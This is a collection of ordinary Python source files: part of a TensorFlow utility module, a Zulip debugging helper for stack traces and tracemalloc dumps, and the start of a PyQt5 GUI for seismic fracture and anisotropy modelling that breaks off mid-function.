values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
updates: [tf.Operation] or tf.Operation
list of update functions or single update function that will be run whenever
the function is called. The return is ignored.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/bias" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " "*(55-len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params*1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
from baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
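# A small illustrative example (the shapes here are hypothetical): feeding a
# flat list to a placeholder of shape [None, 2] reshapes it to (-1, 2):
#
#   ph = tf.placeholder(tf.float32, [None, 2])
#   adjust_shape(ph, [1.0, 2.0, 3.0, 4.0])  # -> array of shape (2, 2)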
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
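    # NOTE: the early return below short-circuits the comparison, so every
    # shape is currently accepted; the remaining checks are kept for reference.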
return True
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
debug.py
|
import code
import gc
import logging
import os
import signal
import socket
import threading
import traceback
import tracemalloc
from types import FrameType
from django.conf import settings
from django.utils.timezone import now as timezone_now
from typing import Optional
logger = logging.getLogger('zulip.debug')
# Interactive debugging code from
# http://stackoverflow.com/questions/132058/showing-the-stack-trace-from-a-running-python-application
# (that link also points to code for an interactive remote debugger
# setup, which we might want if we move Tornado to run in a daemon
# rather than via screen).
def interactive_debug(sig: int, frame: FrameType) -> None:
"""Interrupt running process, and provide a python prompt for
interactive debugging."""
d = {'_frame': frame} # Allow access to frame object.
d.update(frame.f_globals) # Unless shadowed by global
d.update(frame.f_locals)
message = "Signal received : entering python shell.\nTraceback:\n"
message += ''.join(traceback.format_stack(frame))
i = code.InteractiveConsole(d)
i.interact(message)
# SIGUSR1 => Just print the stack
# SIGUSR2 => Print stack + open interactive debugging shell
def interactive_debug_listen() -> None:
signal.signal(signal.SIGUSR1, lambda sig, stack: traceback.print_stack(stack))
signal.signal(signal.SIGUSR2, interactive_debug)
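# For example, with a hypothetical pid of 12345, `kill -USR1 12345` prints the
# current stack, and `kill -USR2 12345` additionally opens the interactive shell.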
def tracemalloc_dump() -> None:
if not tracemalloc.is_tracing():
logger.warning("pid {}: tracemalloc off, nothing to dump"
.format(os.getpid()))
return
# Despite our name for it, `timezone_now` always deals in UTC.
basename = "snap.{}.{}".format(os.getpid(),
timezone_now().strftime("%F-%T"))
path = os.path.join(settings.TRACEMALLOC_DUMP_DIR, basename)
os.makedirs(settings.TRACEMALLOC_DUMP_DIR, exist_ok=True)
gc.collect()
tracemalloc.take_snapshot().dump(path)
procstat = open('/proc/{}/stat'.format(os.getpid()), 'rb').read().split()
rss_pages = int(procstat[23])
logger.info("tracemalloc dump: tracing {} MiB ({} MiB peak), using {} MiB; rss {} MiB; dumped {}"
.format(tracemalloc.get_traced_memory()[0] // 1048576,
tracemalloc.get_traced_memory()[1] // 1048576,
tracemalloc.get_tracemalloc_memory() // 1048576,
rss_pages // 256,
basename))
def tracemalloc_listen_sock(sock: socket.socket) -> None:
logger.debug('pid {}: tracemalloc_listen_sock started!'.format(os.getpid()))
while True:
sock.recv(1)
tracemalloc_dump()
listener_pid = None # type: Optional[int]
def tracemalloc_listen() -> None:
global listener_pid
if listener_pid == os.getpid():
# Already set up -- and in this process, not just its parent.
return
logger.debug('pid {}: tracemalloc_listen working...'.format(os.getpid()))
listener_pid = os.getpid()
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
path = "/tmp/tracemalloc.{}".format(os.getpid())
sock.bind(path)
thread = threading.Thread(target=lambda: tracemalloc_listen_sock(sock),
daemon=True)
thread.start()
logger.debug('pid {}: tracemalloc_listen done: {}'.format(
os.getpid(), path))
def maybe_tracemalloc_listen() -> None:
'''If tracemalloc tracing enabled, listen for requests to dump a snapshot.
To trigger once this is listening:
echo | socat -u stdin unix-sendto:/tmp/tracemalloc.$pid
To enable in the Zulip web server: edit /etc/zulip/uwsgi.ini ,
and add e.g. ` PYTHONTRACEMALLOC=5` to the `env=` line.
This function is called in middleware, so the process will
automatically start listening.
To enable in other contexts: see upstream docs
https://docs.python.org/3/library/tracemalloc .
You may also have to add a call to this function somewhere.
'''
if os.environ.get('PYTHONTRACEMALLOC'):
# If the server was started with `tracemalloc` tracing on, then
# listen for a signal to dump `tracemalloc` snapshots.
tracemalloc_listen()
|
fracturePP.py
|
import os
import subprocess
import sys
import threading
import shutil
import numpy as np
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import QMessageBox
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from sympy import roots
from sympy.abc import x
from fracturePP_gui import Ui_MainWindow
class MyFirstGuiProgram(Ui_MainWindow):
def __init__(self, dialog):
Ui_MainWindow.__init__(self)
self.setupUi(dialog)
        ### Create the layout for plotting
        # Tab 1 figure
self.fig = Figure(figsize=(8,3),facecolor='white')
self.fig.subplots_adjust(hspace= 0.40, wspace= 0.60,left=0.10, right=0.98, top=0.88, bottom=0.14)
self.canvas = FigureCanvas(self.fig)
self.canvas.setParent(self.widget)
layout = QtWidgets.QVBoxLayout()
self.widget.setLayout(layout)
layout.addWidget(self.canvas)
self.mpl_toolbar = NavigationToolbar(self.canvas, self.widget)
self.fig.text(0.5, 0.1, 'Geofone', va='center')
self.fig.text(0.02, 0.33, 'Tempo(s)', va='center', rotation='vertical')
self.fig.text(0.45, 0.5, 'Ângulo de incidência (graus)', va='center', size= 8)
self.fig.text(0.02, 0.73, 'Coeficiente de reflexão', va='center', rotation='vertical', size=7)
self.axes = self.fig.add_subplot(211)
self.axes2 = self.axes.twiny()
self.axes.grid()
self.axes_time = self.fig.add_subplot(212)
self.axes.tick_params(labelsize=6)
self.axes2.tick_params(labelsize=6)
self.axes_time.tick_params(labelsize=6)
self.axes_time.grid()
        # tab 2 figure
self.fig_anray = Figure(figsize=(9,6), facecolor='white')
self.fig_anray2 = Figure(figsize=(9, 6), facecolor='white')
self.fig_anray.text(0, 0.6, 'Coeficiente de reflexão', va='center', rotation='vertical')
self.fig_anray.text(0.985, 0.6, 'Separação', va='center', rotation='vertical')
self.fig_anray.text(0.48, 0.12, 'Distância(m)', va='center')
self.fig_anray2.text(0, 0.6, 'Coeficiente de reflexão', va='center', rotation='vertical')
self.fig_anray2.text(0.48, 0.12, 'Distância(m)', va='center')
self.canvas_anray = FigureCanvas(self.fig_anray)
self.canvas_anray2 = FigureCanvas(self.fig_anray2)
self.canvas_anray.setParent(self.widget_anray)
self.canvas_anray2.setParent(self.widget_anray2)
layout = QtWidgets.QVBoxLayout()
layout2 = QtWidgets.QVBoxLayout()
self.widget_anray.setLayout(layout)
layout.addWidget(self.canvas_anray)
self.widget_anray2.setLayout(layout2)
layout2.addWidget(self.canvas_anray2)
self.mpl_toolbar = NavigationToolbar(self.canvas_anray, self.widget_anray)
self.mpl_toolbar2 = NavigationToolbar(self.canvas_anray2, self.widget_anray2)
self.fig_anray.subplots_adjust(hspace=0.27, left=0.10, right=0.92, top=0.92, bottom=0.18)
self.fig_anray2.subplots_adjust(hspace=0.27, left=0.10, right=0.98, top=0.93, bottom=0.18)
#subplots
self.axes_anray_tot = self.fig_anray.add_subplot(411)
self.axes_anray2_tot = self.fig_anray2.add_subplot(411)
self.axes_anray_tot2 = self.axes_anray_tot.twinx()
self.axes_anray_tot.set_ylabel("total")
self.axes_anray2_tot.set_ylabel("total")
self.axes_anray_rad = self.fig_anray.add_subplot(412)
self.axes_anray2_rad = self.fig_anray2.add_subplot(412)
self.axes_anray_rad.set_ylabel("radial")
self.axes_anray2_rad.set_ylabel("radial")
self.axes_anray_rad2 = self.axes_anray_rad.twinx()
self.axes_anray_z = self.fig_anray.add_subplot(413)
self.axes_anray2_z = self.fig_anray2.add_subplot(413)
self.axes_anray_z.set_ylabel("vertical")
self.axes_anray2_z.set_ylabel("vertical")
self.axes_anray_z2 = self.axes_anray_z.twinx()
self.axes_anray_time = self.fig_anray.add_subplot(414)
self.axes_anray2_time = self.fig_anray2.add_subplot(414)
self.axes_anray_time.set_ylabel('tempo')
self.axes_anray2_time.set_ylabel('tempo')
self.axes_anray_tot.grid()
self.axes_anray_rad.grid()
self.axes_anray2_rad.grid()
self.axes_anray_z.grid()
self.axes_anray_time.grid()
self.axes_anray2_tot.grid()
self.axes_anray2_z.grid()
self.axes_anray2_time.grid()
self.axes_anray_tot.tick_params(labelsize=6)
self.axes_anray_rad.tick_params(labelsize=6)
self.axes_anray2_rad.tick_params(labelsize=6)
self.axes_anray_tot2.tick_params(labelsize=6)
self.axes_anray_rad2.tick_params(labelsize=6)
self.axes_anray_z.tick_params(labelsize=6)
self.axes_anray_z2.tick_params(labelsize=6)
self.axes_anray2_tot.tick_params(labelsize=6)
self.axes_anray2_z.tick_params(labelsize=6)
###
        # tab 3 figure
self.fig_sismo = Figure(dpi=50, facecolor='white')
self.canvas_sismo = FigureCanvas(self.fig_sismo)
self.canvas_sismo.setParent(self.widget_sismo)
self.fig_sismo.subplots_adjust(wspace=0.11, left=0.05, right=0.98, top=0.93, bottom=0.10)
layout = QtWidgets.QVBoxLayout()
self.widget_sismo.setLayout(layout)
layout.addWidget(self.canvas_sismo)
self.axes_sismo_x = self.fig_sismo.add_subplot(121)
self.axes_sismo_z = self.fig_sismo.add_subplot(122)
self.mpl_toolbar = NavigationToolbar(self.canvas_sismo, self.widget_sismo)
self.fig_sismo.text(0.48, 0.04, 'Distância (m)', va='center', size= 14)
self.fig_sismo.text(0.01, 0.5, 'Tempo (s)', va='center', rotation='vertical', size= 14)
self.fig_sismo.text(0.25, 0.96, 'Radial', va='center', size= 14)
self.fig_sismo.text(0.75, 0.96, 'Vertical', va='center', size=14)
        # tab 4 figure
self.fig_sismo2 = Figure(dpi=100, facecolor='white')
self.canvas_sismo2 = FigureCanvas(self.fig_sismo2)
self.canvas_sismo2.setParent(self.widget_sismo2)
self.fig_sismo2.set_tight_layout(True)
layout = QtWidgets.QVBoxLayout()
self.widget_sismo2.setLayout(layout)
layout.addWidget(self.canvas_sismo2)
self.axes_sismo2_1 = self.fig_sismo2.add_subplot(211)
self.axes_sismo2_2 = self.fig_sismo2.add_subplot(212)
self.mpl_toolbar = NavigationToolbar(self.canvas_sismo2, self.widget_sismo2)
        ### Set the initial values
self.spinBox_vp1.setValue(2250)
self.spinBox_vs1.setValue(1200)
self.spinBox_p1.setValue(2100)
self.spinBox_vp2.setValue(4500)
self.spinBox_vs2.setValue(2500)
self.spinBox_p2.setValue(2700)
        # Velocities from the Ruger 1997 model (for testing)
# self.spinBox_vp1.setValue(2260)
# self.spinBox_vs1.setValue(1428)
# self.spinBox_p1.setValue(2600)
# self.spinBox_vp2.setValue(2485)
# self.spinBox_vs2.setValue(1489)
# self.spinBox_p2.setValue(2700)
self.doubleSpinBox_aspect.setValue(0.01)
self.spinBox_fract.setValue(5)
self.doubleSpinBox_bulk.setValue(2.2)
self.doubleSpinBox_shear.setValue(0)
self.spinBox_thick.setValue(100)
self.spinBox_ngeo.setValue(48)
self.spinBox_rmin.setValue(20)
self.spinBox_rstep.setValue(2)
self.size = 0
self.size_plot = 0
self.time_basalto =0
self.time_solo = 0
self.refl_tot_0 = 0
self.refl_tot_30 = 0
self.refl_tot_45 = 0
self.refl_tot_60 = 0
self.refl_tot_90 = 0
self.refl_x_0 = 0
self.refl_x_30 = 0
self.refl_x_45 = 0
self.refl_x_60 = 0
self.refl_x_90 = 0
self.refl_y_0 = 0
self.refl_y_30 = 0
self.refl_y_45 = 0
self.refl_y_60 = 0
self.refl_y_90 = 0
self.refl_z_0 = 0
self.refl_z_30 = 0
self.refl_z_45 = 0
self.refl_z_60 = 0
self.refl_z_90 = 0
self.refl_solo_rad_0 = 0
self.refl_solo_y_0 = 0
self.refl_solo_z_0 = 0
self.refl_solo_x_30 = 0
self.refl_solo_y_30 = 0
self.refl_solo_z_30 = 0
self.refl_solo_x_45 = 0
self.refl_solo_y_45 = 0
self.refl_solo_z_45 = 0
self.refl_solo_x_60 = 0
self.refl_solo_y_60 = 0
self.refl_solo_z_60 = 0
self.refl_solo_x_60 = 0
self.refl_solo_y_60 = 0
self.refl_solo_z_60 = 0
self.refl_solo_x_90 = 0
self.refl_solo_y_90 = 0
self.refl_solo_z_90 = 0
        self.solo_fase_rad = 0  # for the soil layer the phases are equal at all azimuths...
self.solo_fase_z = 0
self.hti_fase_rad_0 = 0
self.hti_fase_rad_30 = 0
self.hti_fase_rad_45 = 0
self.hti_fase_rad_60 = 0
self.hti_fase_rad_90 = 0
self.hti_fase_z_0 = 0
self.hti_fase_z_30 = 0
self.hti_fase_z_45 = 0
self.hti_fase_z_60 = 0
self.hti_fase_z_90 = 0
self.dn = 0
self.dt = 0
self.dist=0
###
        ### Define the actions (signal connections)
self.spinBox_vp1.valueChanged.connect(self.vp1)
self.spinBox_vp2.valueChanged.connect(self.vp2)
self.spinBox_vs1.valueChanged.connect(self.plot)
self.spinBox_p1.valueChanged.connect(self.plot)
self.spinBox_vp2.valueChanged.connect(self.weak_calc)
self.spinBox_vs2.valueChanged.connect(self.weak_calc)
self.spinBox_p2.valueChanged.connect(self.weak_calc)
self.doubleSpinBox_aspect.valueChanged.connect(self.weak_calc)
self.spinBox_fract.valueChanged.connect(self.slider_pos)
self.doubleSpinBox_aspect.valueChanged.connect(self.slider_pos)
self.doubleSpinBox_bulk.valueChanged.connect(self.weak_calc)
self.doubleSpinBox_shear.valueChanged.connect(self.weak_calc)
self.verticalSlider_fract.valueChanged.connect(self.weak_calc)
self.verticalSlider_aspect.valueChanged.connect(self.slider_pos1)
self.doubleSpinBox_DN.valueChanged.connect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.connect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.connect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.connect(self.slider_pos3)
self.doubleSpinBox_d.valueChanged.connect(self.plot)
self.doubleSpinBox_e.valueChanged.connect(self.plot)
self.doubleSpinBox_y.valueChanged.connect(self.plot)
self.spinBox_ngeo.valueChanged.connect(self.plot)
self.spinBox_rmin.valueChanged.connect(self.plot)
self.spinBox_rstep.valueChanged.connect(self.plot)
self.spinBox_thick.valueChanged.connect(self.plot)
self.split_box0_90.stateChanged.connect(self.plot)
self.split_box0_45.stateChanged.connect(self.plot)
self.split_box45_90.stateChanged.connect(self.plot)
self.split_box30_60.stateChanged.connect(self.plot)
self.split_box_anray_0_90.stateChanged.connect(self.split)
self.split_box_anray_0_45.stateChanged.connect(self.split)
self.split_box_anray_30_60.stateChanged.connect(self.split)
self.split_box_anray_45_90.stateChanged.connect(self.split)
self.pushButton.clicked.connect(self.anray)
self.checkBox_solo.pressed.connect(self.activate)
self.checkBox_solo.released.connect(self.plot)
self.pushButton_2.pressed.connect(self.plot)
self.verticalSlider_aspect.valueChanged.connect(self.slider_pos1)
self.sismo_button.clicked.connect(self.plot_sismograma)
self.radioButton_0.toggled.connect(self.plot_sismograma_v)
self.radioButton_30.toggled.connect(self.plot_sismograma_v)
self.radioButton_45.toggled.connect(self.plot_sismograma_v)
self.radioButton_60.toggled.connect(self.plot_sismograma_v)
self.radioButton_90.toggled.connect(self.plot_sismograma_v)
self.radioButton_plot_x.toggled.connect(self.plot_sismo_azim)
self.radioButton_plot_z.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_0_90.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_0_45.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_45_90.toggled.connect(self.plot_sismo_azim)
self.radio_sismo_30_60.toggled.connect(self.plot_sismo_azim)
self.checkBox_solo_sismo.clicked.connect(self.sismo_enable)
self.az_tmin.valueChanged.connect(self.plot_sismo_azim)
self.az_tmax.valueChanged.connect(self.plot_sismo_azim)
self.slider_pos()
self.anray_path = os.getcwd()
if not os.path.exists('HTI_P_model'):
os.makedirs('HTI_P_model')
def vp1(self):
vp = self.spinBox_vp1.value()
vs = vp/np.sqrt(3)
self.spinBox_vs1.setValue(vs)
def vp2(self):
vp = self.spinBox_vp2.value()
vs = vp/np.sqrt(3)
self.spinBox_vs2.setValue(vs)
def message(self):
msg = QMessageBox()
msg.setIcon(QMessageBox.Warning)
msg.setText("Erro")
msg.setInformativeText("Certifique-se de gerar os arquivos e manter a opção (solo) correspondente na primeira aba.")
msg.exec_()
#Enables or disables the soil-layer inputs used in the calculations
def activate(self):
if self.checkBox_solo.isChecked():
self.solo_espessura.setDisabled(True)
self.solo_vp.setDisabled(True)
self.solo_vs.setDisabled(True)
self.solo_densidade.setDisabled(True)
else:
self.solo_espessura.setEnabled(True)
self.solo_vp.setEnabled(True)
self.solo_vs.setEnabled(True)
self.solo_densidade.setEnabled(True)
self.pushButton_2.setEnabled(True)
#Functions that keep the spin boxes and sliders in sync.
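# Note: Qt's QSlider only stores integer values, so the sliders hold the spin-box
# quantities scaled by a constant factor (x1000 for DN/DT, x10000 for the aspect
# ratio) and the helpers below simply convert between the two representations.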
def slider_pos(self):
self.verticalSlider_fract.setValue(self.spinBox_fract.value())
def slider_pos1(self):
self.doubleSpinBox_aspect.setValue(self.verticalSlider_aspect.value() / 10000)
def slider_pos2(self):
self.verticalSlider_DN.setValue(self.doubleSpinBox_DN.value()*1000)
self.verticalSlider_DT.setValue(self.doubleSpinBox_DT.value()*1000)
def slider_pos3(self):
self.doubleSpinBox_DN.setValue(self.verticalSlider_DN.value()/1000)
self.doubleSpinBox_DT.setValue(self.verticalSlider_DT.value()/1000)
self.aniso_parameters()
#Computes the fracture weakness parameters
def weak_calc(self):
self.doubleSpinBox_DN.valueChanged.disconnect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.disconnect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.disconnect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.disconnect(self.slider_pos3)
#Adjust the spin box value according to the slider
self.spinBox_fract.setValue(self.verticalSlider_fract.value())
self.verticalSlider_aspect.setValue(self.doubleSpinBox_aspect.value()*10000)
# degree of fracturing (as a fraction) and aspect ratio
e = self.spinBox_fract.value() / 100
a = self.doubleSpinBox_aspect.value()
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
g = (vs2 ** 2) / (vp2 ** 2)
# Lame parameter mu
mu = p2 * (vs2 ** 2)
# bulk and shear modulus
kl = self.doubleSpinBox_bulk.value() * 10 ** 9
ul = self.doubleSpinBox_shear.value() * 10 ** 9
# Hudson-type fracture weaknesses. Taken from Chen 2014 (eq. 2) and Bakulin 2000 (eq. 14)
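# DN and DT below are the normal and tangential fracture weaknesses of the
# equivalent linear-slip medium; kl and ul (entered in GPa, converted to Pa above)
# are, presumably, the bulk and shear moduli of the crack-filling material.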
DN = 4 * e / (3 * g * (1 - g) * (1 + ((kl + (4 / 3) * ul) / (np.pi * (1 - g) * mu * a))))
self.doubleSpinBox_DN.setValue(DN)
self.verticalSlider_DN.setValue(DN*1000)
DT= 16 * e / (3 * (3 - 2 * g) * (1 + ((4 * ul) / (np.pi * (3 - 2 * g) * mu * a))))
self.doubleSpinBox_DT.setValue(DT)
self.verticalSlider_DT.setValue(DT*1000)
self.doubleSpinBox_DN.valueChanged.connect(self.slider_pos2)
self.doubleSpinBox_DT.valueChanged.connect(self.slider_pos2)
self.verticalSlider_DN.valueChanged.connect(self.slider_pos3)
self.verticalSlider_DT.valueChanged.connect(self.slider_pos3)
self.aniso_parameters()
#Computes the anisotropy parameters
def aniso_parameters(self):
self.doubleSpinBox_d.valueChanged.disconnect(self.plot)
self.doubleSpinBox_e.valueChanged.disconnect(self.plot)
self.doubleSpinBox_y.valueChanged.disconnect(self.plot)
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
DN_H = self.doubleSpinBox_DN.value()
DT_H = self.doubleSpinBox_DT.value()
# Following Chen 2014 and Bakulin 2000 (eq. 27)
# Lame parameters
lamb = p2 * (vp2 ** 2 - 2 * (vs2 ** 2))
mu = p2 * (vs2 ** 2)
M = lamb + 2 * mu
r = lamb / M
c11 = M * (1 - DN_H)
c33 = M * (1 - (r ** 2) * DN_H)
c13 = lamb * (1 - DN_H)
c44 = mu
c66 = mu * (1 - DT_H)
c55 = c66
c23 = c33 - 2 * c44
self.c11 = (c11/p2)/1000000
self.c13 = (c13/p2)/1000000
self.c23 = (c23/p2)/1000000
self.c33 = (c33/p2)/1000000
self.c44 = (c44/p2)/1000000
self.c55 = (c55 /p2)/1000000
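# The stiffnesses are divided by the density p2 and by 1e6 so that they are stored as
# density-normalized values in km^2/s^2 (assuming densities in kg/m^3 and velocities in m/s),
# matching the squared velocities in km/s written for the isotropic layers of the anray file.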
#To print the elastic parameters, uncomment the lines below.
# print('A11=', c11/p2)
# print('A13=', c13/p2)
# print('A23=', c23/p2)
# print('A33=', c33/p2)
# print('A44=', c44/p2)
# print('A55=', c55/p2)
self.dn = DN_H
self.dt = DT_H
e2_v = (c11 - c33) / (2 * c33)
self.doubleSpinBox_e.setValue(abs(e2_v))
d2_v = (((c13 + c55) ** 2) - ((c33 - c55) ** 2)) / (2 * c33 * (c33 - c55))
self.doubleSpinBox_d.setValue(abs(d2_v))
y2_v = (c66 - c44) / (2 * c44)
self.doubleSpinBox_y.setValue(abs(y2_v))
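# e2_v, d2_v and y2_v are Thomsen-style anisotropy parameters (epsilon, delta, gamma)
# of the equivalent anisotropic layer; only their magnitudes are shown in the GUI.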
self.doubleSpinBox_d.valueChanged.connect(self.plot)
self.doubleSpinBox_e.valueChanged.connect(self.plot)
self.doubleSpinBox_y.valueChanged.connect(self.plot)
self.plot()
#Main plotting routine
def plot(self):
self.axes.cla()
self.axes_time.cla()
# Parameters of the upper medium (1)
vp1 = self.spinBox_vp1.value()
vs1 = self.spinBox_vs1.value()
p1 = self.spinBox_p1.value()
# Parameters of the lower medium (2)
vp2 = self.spinBox_vp2.value()
vs2 = self.spinBox_vs2.value()
p2 = self.spinBox_p2.value()
# Vertical impedance
Z1 = p1 * vp1
Z2 = p2 * vp2
# Shear modulus
G1 = p1 * pow(vs1, 2)
G2 = p2 * pow(vs2, 2)
# differences and averages
deltaZ = Z2 - Z1
medZ = (Z1 + Z2) / 2
deltaG = G2 - G1
medG = (G1 + G2) / 2
deltavp = vp2 - vp1
medvp = (vp1 + vp2) / 2
deltavs = vs2 - vs1
medvs = (vs1 + vs2) / 2
deltad = -self.doubleSpinBox_d.value()
